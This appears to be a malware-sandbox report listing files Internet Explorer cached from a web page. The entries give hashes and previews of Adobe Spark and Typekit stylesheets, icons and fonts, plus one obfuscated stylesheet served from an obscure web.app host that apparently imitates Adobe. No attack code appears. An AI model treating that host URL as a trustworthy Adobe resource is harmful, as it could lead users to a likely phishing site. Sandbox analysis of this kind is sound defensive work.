                                                                                                                                                                                                                                                        Preview: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 56 54" width="56px" height="54px"><defs><style>.cls-1{fill:#370000;}.cls-2{fill:#fa0f00;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Surfaces"><g id="Spark_Surface" data-name="Spark Surface"><g id="Outline_no_shadow" data-name="Outline no shadow"><rect class="cls-1" width="56" height="54" rx="9.91"/></g></g></g><g id="Outlined_Mnemonics_Logos" data-name="Outlined Mnemonics &amp; Logos"><g id="Sp"><path class="cls-2" d="M18.05,38.37A18.68,18.68,0,0,1,14.3,38a12.08,12.08,0,0,1-2.83-.91c-.2-.09-.3-.3-.3-.62V32.35a.22.22,0,0,1,.09-.2.25.25,0,0,1,.25,0,11.84,11.84,0,0,0,3.29,1.17,12.74,12.74,0,0,0,3.4.48,5.28,5.28,0,0,0,3-.65,1.91,1.91,0,0,0,.9-1.61,2.13,2.13,0,0,0-.29-1.12,3.1,3.1,0,0,0-1-1,11.61,11.61,0,0,0-2-1l-1.85-.78a13.89,13.89,0,0,1-3.54-2.05,6,6,0,0,1-1.75-2.35,7.53,7.53,0,0,1-.49-2.7,6.64,6.64,0,0,1,4-6.2,11.25,11.25,0,0,1,4.89-1,22.84,22.84,0,0,1,3.31.23,7.22,7.22,0,0,1,2.39.71.52.52,0,0,1,.26.48v3.89c0,.05,0,.1-.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\styles[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):12546
                                                                                                                                                                                                                                                        Entropy (8bit):4.665514700841603
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:lOzWVwH6jCZDitH75vH1V/FAF/1Sr+aGF5OJE9h0To9ZXspA:95171PFAF95bFQ98XH
                                                                                                                                                                                                                                                        MD5:50ED2FA269F431C0A417BFE9FDED33E2
                                                                                                                                                                                                                                                        SHA1:80D79B3245378859380B393629721F306FF7924D
                                                                                                                                                                                                                                                        SHA-256:3DC5C5C6562569E53273584B35FFF491E32E2E5F37100A21B2BC488F229A7EA7
                                                                                                                                                                                                                                                        SHA-512:14526A2FA99B0949CE15B9A6477A808326E0E1F4D6666EF4C03DF73421726008B2E300403D2D9F9F884D029E9AEE8DBA8134E9C0609C7D011D28F21AB6D0A6A2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/styles/styles.css
                                                                                                                                                                                                                                                        Preview: body {. font-family: 'adobe-clean', 'Adobe Clean', sans-serif;. background-color: #FFF;. color: #232323;. margin: 0;. padding: 0;.}..main {. display: none;.}..main.appear {. display: block;.}../* gnav placeholder */..header {. box-sizing: border-box;. border-bottom: 1px solid #EAEAEA;. height: 153px;. position: relative;. background-color: white;.}..#feds-header {. opacity: 0;.}..#feds-header.appear {. opacity: 1;.}..#header-placeholder {. height: 64px;. position: absolute;. top: 0;. left: 0;. width: 100%;. z-index: 10;. -webkit-font-smoothing: antialiased;. border-bottom: 1px solid #EAEAEA;. transition: all 0.3s;. background-color: white;.}..#header-placeholder.disappear {. /* display: none; */. opacity: 0;. z-index: -1;.}..#header-placeholder .desktop {. display: none;.}..#header-placeholder .mobile {. display: flex;. justify-content: space-between;. align-items: center;. height: 64px;. box-sizing: border-box;. pad
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\typekit-load.gz[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):67
                                                                                                                                                                                                                                                        Entropy (8bit):4.670181915303587
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:yLRmcszgcukrQLJkgfw0zRjf:yL/0gcu/LugfwmRr
                                                                                                                                                                                                                                                        MD5:5D83D0AA1685849B1ACEB2382FB6BEF2
                                                                                                                                                                                                                                                        SHA1:496F8CB19AAD2E89C4748729BD096CD69C96F79E
                                                                                                                                                                                                                                                        SHA-256:7DACF0B95D4AFF38FE7E25986827EFA6A5C9B1B180C66DAA7D61CD2F862FDE1F
                                                                                                                                                                                                                                                        SHA-512:41502C0C3B1B100F4A73F507C5F15BDE9CE4ED515BAB059C28B1CA902D4C986A54FB7E39ECAAB20495AD0DD5637BEDA589A90FAC3113D1AE6161F1A4B857A1EE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/typekit-load.gz.js
                                                                                                                                                                                                                                                        Preview: document.write("<script>try{Typekit.load();}catch(e){}<\/script>");
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\vtg4qoo[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):18975
                                                                                                                                                                                                                                                        Entropy (8bit):5.588875152231931
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:bTz4QhLGD8h2tpIgIPs51iRm2lIew42noFeFsP9btiCtpIaCR:vz4QhLA8zq1iRm2XwMqsbbt6J
                                                                                                                                                                                                                                                        MD5:46700293FD68A3707BEAF54E63C4D9A8
                                                                                                                                                                                                                                                        SHA1:5F1130A35AC5C767DF52A13CC14D412B0A1CC0E9
                                                                                                                                                                                                                                                        SHA-256:413B5751660E454D49C8430CBD09054C97E7B0560660B14892FF6048E4CDDE46
                                                                                                                                                                                                                                                        SHA-512:FE06C4159C0968AA5DCB63DEEF234973D8B9F66C54DFCC350FA840072D5DE40F691C05844A5DA4A682F0D2ED2E5FCB90318DCAE981C7A532D2BD9A1FE5887889
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/000000000000000000017701. * - http://typekit.com/eulas/000000000000000000017703. * - http://typekit.com/eulas/0000000000000000000176ff. * - http://typekit.com/eulas/000000000000000000017706. * brandon-grotesque:. * - http://typekit.com/eulas/0000000000000000000132df. * - http://typekit.com/eulas/0000000000000000000132e3. * - http://typekit.com/eulas/0000000000000000000132e1. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1655249","c":[".tk-adobe-clean","\"adobe-clean\",sans-serif",".tk-brandon-grotesque","\"brandon-grotesque\",sans-serif"],"fi":[7180,7182,7184,22474,10294,10296,10302],"fc":[{"i
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\SPRK_color_hover_v3@2x[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1004
                                                                                                                                                                                                                                                        Entropy (8bit):5.187217692853858
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:tvG1XftzSHn4vj0SeX47LiiLAiUw/U+VH3NLzaDobULhqq9BS9C6gEKYoaWZKq2e:tu1XftHvxeIAvFiXtTbUJkUEhCP
                                                                                                                                                                                                                                                        MD5:E9D94F821371E183B8B58F618B2FC161
                                                                                                                                                                                                                                                        SHA1:792948E6A17CF091CCDC329A09EE22BF1A1A9CF5
                                                                                                                                                                                                                                                        SHA-256:AC03A140536DC39782AFA5C742E10515D20C24DB3152DCB04471252C856B7FF4
                                                                                                                                                                                                                                                        SHA-512:A9EC755233EAB39EE91630F379412BB469BADE01784095A13F7FC3E62C860E0BD0618A43554D909049B4716C0CF0F6A582E69DF3962384ACEDDBEF911013EEE4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/SPRK_color_hover_v3@2x.svg
                                                                                                                                                                                                                                                        Preview: <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 56 54" width="56" height="54"><defs><style>.cls-1{fill:#370000;}.cls-2{fill:#fa0f00;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Surfaces"><g id="Spark_Surface" data-name="Spark Surface"><path id="Outline_no_shadow" data-name="Outline no shadow" class="cls-1" d="M9.9,0H46.1A9.8588,9.8588,0,0,1,56,9.9V44.1A9.8588,9.8588,0,0,1,46.1,54H9.9A9.8588,9.8588,0,0,1,0,44.1V9.9A9.8588,9.8588,0,0,1,9.9,0Z"/></g></g><g id="Outlined_Mnemonics_Logos" data-name="Outlined Mnemonics Logos"><g id="Sp"><path class="cls-1" d="M0,0"/></g></g></g><path class="cls-2" d="M43.6,26.3l-15-15a1.1989,1.1989,0,0,0-1.4,0l-15.1,15a1.1989,1.1989,0,0,0,0,1.4l1.8,1.8a1.143,1.143,0,0,0,.7.3h.7V38a1.0714,1.0714,0,0,0,1,1h7.2a1.0714,1.0714,0,0,0,1-1V28.9a1.0714,1.0714,0,0,1,1-1h5.3a1.0714,1.0714,0,0,1,1,1V38a1.0714,1.0714,0,0,0,1,1H40a1.0714,1.0714,0,0,0,1-1V29.7h.7c.3,0,.4-.1.7-.3l1.8-1.8C44.1,27.2,44.1,26.6,43.6,26.3Z"/></s
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Security_72px_lt-gray-01[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):28075
                                                                                                                                                                                                                                                        Entropy (8bit):6.122713193021488
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:3jYU3YROQayWcpEepYNGWS8f7Bau7MfYR9/sH53ABwPJ5anlMelCeZpCZRhA6pDh:3B3elubSc7EusYi+9XlC/hAiDthP3eJy
                                                                                                                                                                                                                                                        MD5:82139CDA626B6F7046B190923E4E1678
                                                                                                                                                                                                                                                        SHA1:CBEF7F51F834C6EF8197ECB1AF9F7C1C1693A44D
                                                                                                                                                                                                                                                        SHA-256:12E03ED2EEE83C341A3DE969B11CEED1849891C2775434A06438EABFC66CCA3C
                                                                                                                                                                                                                                                        SHA-512:90ABCE4D99B32DFF9F951F5213E45C123F4F7C106991D9574530657D0BC63419BD19444055E39868B82929C1D6FA7BA9B0B3E740F52E01B87DF2A482CF17D675
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/content/dam/cc1/en/privacy/images/Security_72px_lt-gray-01.svg
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [..<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">..<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">..<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">..<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">..<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">..<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">..<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">..<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">.]>.<svg version="1.1" id="adobeNews_x5F_72_x5F_lt-ou" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;".. xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="72px" height="72px".. viewBox="-359 271 72 72" style="enab
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\b0144ce106c1cac7417f378d6bd1c1e6nbr1622136582[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):94735
                                                                                                                                                                                                                                                        Entropy (8bit):5.387793696503417
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:h8XgaQWB+kfRUB+7PWrv2XUvBMxLAFi9bkQeemF9:h8XgumJemX
                                                                                                                                                                                                                                                        MD5:BC8C37EE2DE97FC7C474E4A71CA9E8AC
                                                                                                                                                                                                                                                        SHA1:C0E1C604E7177B0709FFD94A47A07EA9801B34E4
                                                                                                                                                                                                                                                        SHA-256:FB6A86BC427B496F8B77431BAE5DD3FA28D8FE4B41A77C0997D8D902A36C7246
                                                                                                                                                                                                                                                        SHA-512:4F9F55F8B9BAFC43DB375204531C23C1F08442E1926071C0E7B15D8056585BF0DF01F6288F84D78183C06670727F9ED57C12E194D988E8DDD8ED2DA8578D526F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://rikapcndbn.web.app/jutyrtersdzx/themes/css/b0144ce106c1cac7417f378d6bd1c1e6nbr1622136582.css
                                                                                                                                                                                                                                                        Preview: .Ecc02caa6ba595c9SY{background-color:white;opacity:0;filter:alpha(opacity=0);z-index:-1;height:100%;width:100%;position:absolute;top:0;left:0;transition:all .5s ease-in;-o-transition:all .5s ease-in;-moz-transition:all .5s ease-in;-webkit-transition:all .5s ease-in}.Ecc02caa6ba595c9SY.disable-lightbox{z-index:10;opacity:.5;filter:alpha(opacity=0)}html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:base
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\browser-icon-edge[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 124 x 124, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3016
                                                                                                                                                                                                                                                        Entropy (8bit):7.891883408525801
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:cCzs80SVhdoz+n+UHXol0c61Ga6ovj4mrikoPmzz3I4NrT6xvO:cT80CAK+UHY9gGa6or4sZ3I4Nr2BO
                                                                                                                                                                                                                                                        MD5:096DBF8523D015FB4295051DF53A52C1
                                                                                                                                                                                                                                                        SHA1:7BB34828A6AB6CB2E6E418ADFBEACF189D07AE3E
                                                                                                                                                                                                                                                        SHA-256:0E95127D87D4498950215D4AD1BAA56BDE661E9DC7BCE84F8249594FBCECC727
                                                                                                                                                                                                                                                        SHA-512:DF694A7FE2BE219DE857DCBC1D9F708960D74B1BFE45AF5F2EC15974C22C15EC2D48DAA6BBA6234BF54185103A00E8EDE486C9320F6A9A8631EE9A7E93D7F501
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/landing/browser-icon-edge.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR...|...|............IDATx.....E...@.B.D...-.....K.d.P.Q.....E.* ...U.*.....`!.`!.....D...... ..$.R&..aK..9/y..wf.......z.......}...D"..f..W.....Z..`1...^...AzKpm.....l.l.l.l......W...g....G....0.E..t!..|w..f...........p...a.....1j.wT..}.k..0.....g.......]..f.....\[.*.4p...g...5p-p.F=...[I...v[`*p.0.7.....7b..M..f...D`.ph..3....\.Q.y.h.......>.C3.7...p5F-......N...........).5..._pm....6.l....31jq.wW.......Y...<...Q.U}.....$.:`K.6..0.*3....z..=...E..i.'0.*NV...)..S=[..sh.?C?.j.OW.~.|.E.X.<..n..D....:.M..=[d .'>..n.,%.V.t~.[...-2...W.Q..b.p..b....E..V.&c./....0...4w..y.HV......S.Ol......bw...h........t.d.=R.uE......}.k.F..|s.Uf..c.N.<a...\.......R..\N.O.i....l..x.\..2.%...E.8..p..&.ID.;.r.p..~....1m.^..^...{......y#L.]....Y.D......ex.D...D.t...3..Gz..Y....o..*<;.Y..%.U'..M..5...t&....]...."q.^..Q..<.O..}...g..W.d...(r.N_....{..d.'q....{.+X...[...X.;.ZF./.aE.Z....".%..,\o.n"t.3;..B<.u&@...p...6t2.:.D..I...uNc.x....@G#.(.=^..k..$.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\d7HW4UWRM
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 66508, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):66508
                                                                                                                                                                                                                                                        Entropy (8bit):7.994636853689064
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:4p7762bluKjsVQJU/x14nXWjvxpGeDKTeEPiBlnQcA+yWB:q362bluKjqQWr4nG7xpP2PiEz0
                                                                                                                                                                                                                                                        MD5:49B061D6468547558176037211AA630C
                                                                                                                                                                                                                                                        SHA1:B02FD5987ED77AF837699BB13C7E838018943423
                                                                                                                                                                                                                                                        SHA-256:F89C62C68380B4BB548E4E24E284348FE9E98730F54F7E0C8942F6AA3BE9DA37
                                                                                                                                                                                                                                                        SHA-512:406D0D0BF1A669E16B9CA101B2DA10C222BBB780DF7B2CB235E2C9F765351846F2A94044C55B0080B875E951FC87462A76B29BE8CD4605EB4D462D321347A490
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n7&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO....................................BASE...X...F...Fe!].CFF ...L.......dX.\\DYNA.............GG9GDYN.......1...a....GPOS...P..#...THAH.5GSUB.............0.OS/2.......Y...`].y.cmap...x...S.....lgasp................head.......5...6..%ghhea... ...!...$....hmtx...........xg.P.maxp...D.........^P.name............E..post...d....... ...2..............ideoromn..DFLT..cyrl..grek..latn...................Y..............x.c`d```5._.._<..W.f..@....^0....~.).......@.....N...x...n.@.....!.V,.@.cGV.FB$m..j.H..6N<i..`O#...@..X.$<......#g........x....^}.-.x.S..t1.|......,=.b...............S.J|...e..s.O......;.]j>z>D.|.|.W...1...R.b.....}muQ..ra...R.3)Fy......T..1...s..c.g...d8..O....'M......FW...-...X*..+c...H*....t..].|=.e"..R........o.fm.......:T.^Q..z...c(.S..........a..w.KN{.l...M]..tu9...k.b.L.N...v...Y..R.[0....1...C*/..8.^...GM..r....jvfx..<.o..t.P.....=Kv-.kr..n.....5.%.9].>q......f:.3<C.e9.-5.:Yz4O....:e....+b.}.oS..1x.c`f.........).....B3.1.1..E.9..XX
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dBVE3H2UF
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 66304, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):66304
                                                                                                                                                                                                                                                        Entropy (8bit):7.993959805787878
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:VeO6ShUivo8vaO8pnTzDOTXL/kxtcA+uDWB:p6DJWaO4iT7/4tzk
                                                                                                                                                                                                                                                        MD5:9E6E819AE9D8993A2B10353EFF16497D
                                                                                                                                                                                                                                                        SHA1:1410161D0CA8CA3966897CAB50E45A14B721C056
                                                                                                                                                                                                                                                        SHA-256:81B4B3BC1EFD4F08F212308D9727BC21A40E38B5464B6B25EBDE1B2E24D13F05
                                                                                                                                                                                                                                                        SHA-512:D9D88E8987EE2F45BFA0B211AAA7DFEB9C39718E9A037FAE625AF4E6806E04D4C8316B58363EEA93E9BA6C23B6F514925D4841C95CDFB103693688D5EFC71DAB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n3&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO...........D........................BASE...X...F...Fe(].CFF ...T........6...DYNA...P.........gG9GDYN...T.../...a... GPOS.....#...T.;..GSUB...0.........0.OS/2.......Y...`[.t.cmap.......S.....lgasp................head.......4...6..%`hhea...(...!...$....hmtx...........x..].maxp...L.........^P.name.............8I.post........... ...2..............ideoromn..DFLT..cyrl..grek..latn...................`..............x.c`d```5.*{..9...+.3........P..?.?....1 ....$.._..!x..An.@....I..jo0.>...!..$H........`a{.=Ab.u.]...B..E..T..<...Y....3.{o....._.....k....x......c.Mj.......f~..B......9...s..A.V......g.Mj.{>F...|..0.[.5>=.P..1X....}iuV..|n..)b..R..TL...b.K].X.R...M..!..H...?....N...N...p..x..21...wS.J.T.m...;.Jv..Y....e..B.....kk....o.&.rn....z~u...%. .Bq\..X.`.M.b.....)p...Y-........r.L.`.5+..i>5.;.<..C3%'...U...X......D..{.!F.~...8=..c.~y.{w.s.*.{..U.....*...._....~.j....*..)Sg.....R^:.u[v..m.....j.eJ.w.u.T.....Oy.s-..m.x..x.c`f......................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dF2IW3MDL
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 23416, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):23416
                                                                                                                                                                                                                                                        Entropy (8bit):7.983586847834522
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:F30DDcDU1FW+RedG9b7Tm16n2XMc3nS3YUQIfiRgeQvYAb0HsRUgBnQc:JOA+Redq61GYU7f/eQvnUgBQc
                                                                                                                                                                                                                                                        MD5:334521D5C314F6265FCA189A2114006F
                                                                                                                                                                                                                                                        SHA1:F35719EE30117ADF919939AD46A98C9D3C6EEE45
                                                                                                                                                                                                                                                        SHA-256:B4D011E6CF7EBE571E4D0C9868CD972592987E13D5BE3DDBB69C67638323A237
                                                                                                                                                                                                                                                        SHA-512:3F6163488D3814E3CEFF964DBA451B45DE22236EED0372A82BC713950CBD0FCC41D4553414095646842B2839F12EF7A95AC943329AC0293FCC9850ECEF6C67CB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/d8f71f/0000000000000000000132e1/27/d?primer=7a5a436c948772f5260024dfadc8f7cd849e1448f8bf41ba74a247e8e46f3aee&fvd=n5&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO..[x................................CFF ......6V..A.....DYNA..:.........AOr.GDYN..:..........E(.GPOS..;x......G ....OS/2...$...[...`}.N.cmap..Z4...C....M.?gasp...0............head...8...2...6...khhea...........$....hmtx..X.........|k .maxp..............P.name...l.........<.bpost..Z ....... ...2........x.c`d``.b....x~...../."..]......ka.g..r...@..k.....x...j.@.........U.e..4rV...p6..h..u.EdI......Q....D.}.>@w=....E[]....;sg.......{.=.8a.s.!>x>...=....=..._<.q...GH.`...'...@...........o.....|.w....Q8.<.<ln.zk.....XM..T....X..Ju[..H....P..*#V.F...........F.%.uo..S.'L....U_.Q..9.u.i....W....8v.Z.r.-.u,M1.......$.A..[..Xb...3,x1..h.%iN...f(...lCg...i.-.q...C..i...........b.+M.WT..g4...;m.l...T.evv..ew').._!}.......2..m..}..v...:....M.....]....:V\....-Y.S$.`...7.....x.c`b|.......i.S...C..f..`...(...........A?.A!...<.\.......1...........0.$.8.i..R``..1....x.c`d``..W.$.....d.g..............P.....x.{.X.W.....3.1.C`.1..I.5.........AQA.....e..4.(....Q@l.F.1
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dH6GBMSR4
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 67148, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):67148
                                                                                                                                                                                                                                                        Entropy (8bit):7.993959168595968
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:nxeF+rR7LkiELPhmOHVSAJTtSrsJBD7JVstEBSQm+aScA+tWB:wEkJzh7S2xysvPst2SQSSzR
                                                                                                                                                                                                                                                        MD5:227960928668E1D655DBAAAE5FE23C11
                                                                                                                                                                                                                                                        SHA1:128EF93AB71A18BA1DB0855C165D050ED8702037
                                                                                                                                                                                                                                                        SHA-256:DFD5B4454E0BEF1EBBE0940DFA3BFB117BEE9E3DF150FA55BE633114816E7179
                                                                                                                                                                                                                                                        SHA-512:BDB17CBB62E2C6B4AF737C7201214A563C27CDC38E1924B2C6EB351950F81A06A10E2DFDD783C82AB108D9758D77DA0A45BA82B08C210F4D8977A33AA6364B3B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/4b3e87/000000000000000000017706/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n9&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO...L................................BASE...X...F...Fe.].CFF ...T...G...CP...DYNA............G9GDYN......1...e. .GPOS......#...S4...0GSUB...x.........0.OS/2.......Y...`^B{.cmap.......S.....lgasp................head.......4...6..%phhea...(...!...$....hmtx...........x.nD.maxp...L.........^P.name...............]post........... ...2..............ideoromn..DFLT..cyrl..grek..latn...................U..............x.c`d```5.2)1O........(.p>9..F.W.....5........;...x...n.0....'E..}..{hZ..8...@29.....~hH....;t.#.......y..@.(.5.!.!....RW.............[x...G....65[.......z~..A.?X...rU......s....#......<{>F...|..2.;X..<.P..1Z....}eu^..bi.)c.WR..L...Vb.+]..l.W...1..e:...,.#.....z<.:.S.:.....E..........P*...c....T..6..T.. .d..HF.....X...v.~......G........9. .Bq\.FX.`.M.c....s..e....h.3v.....8.fH....4gM..+...X..R....Y..KD....D.......?..=N.<..._.........y......C...U....[.....~.lN.~.....W..{.\^;..?.._..a...T...t.....K.Y....}...2..x.c`f.`na`e``.b.```...q.F..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dSARERLI5
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 25284, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):25284
                                                                                                                                                                                                                                                        Entropy (8bit):7.98201537948979
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:XVkwjUeZrzDGdbpwvwrcsOGkps3SNPnvNFbwW8yTqXCrfenp/W0BEpFc2N8F2cp:lkaOdbSo4zAYfV3jfE5Bfh2cp
                                                                                                                                                                                                                                                        MD5:3A472B1A078B7B653C744CC55FAA5219
                                                                                                                                                                                                                                                        SHA1:E9949514223E35D4A1E0515A312EC3664DEFDF33
                                                                                                                                                                                                                                                        SHA-256:8812CEB05FB855A78850BB1907BC621FC487CD6D54760AC8D821D760D3BBB9E3
                                                                                                                                                                                                                                                        SHA-512:DA09A18AED6A3C44F5009410D03623A8200ABF224AF33DDBFE34D3736AF96C6847D7A9A1CF0D94839C9ABB9546E1C7F5BCF6C305132B97BEFBD84A535F1399A7
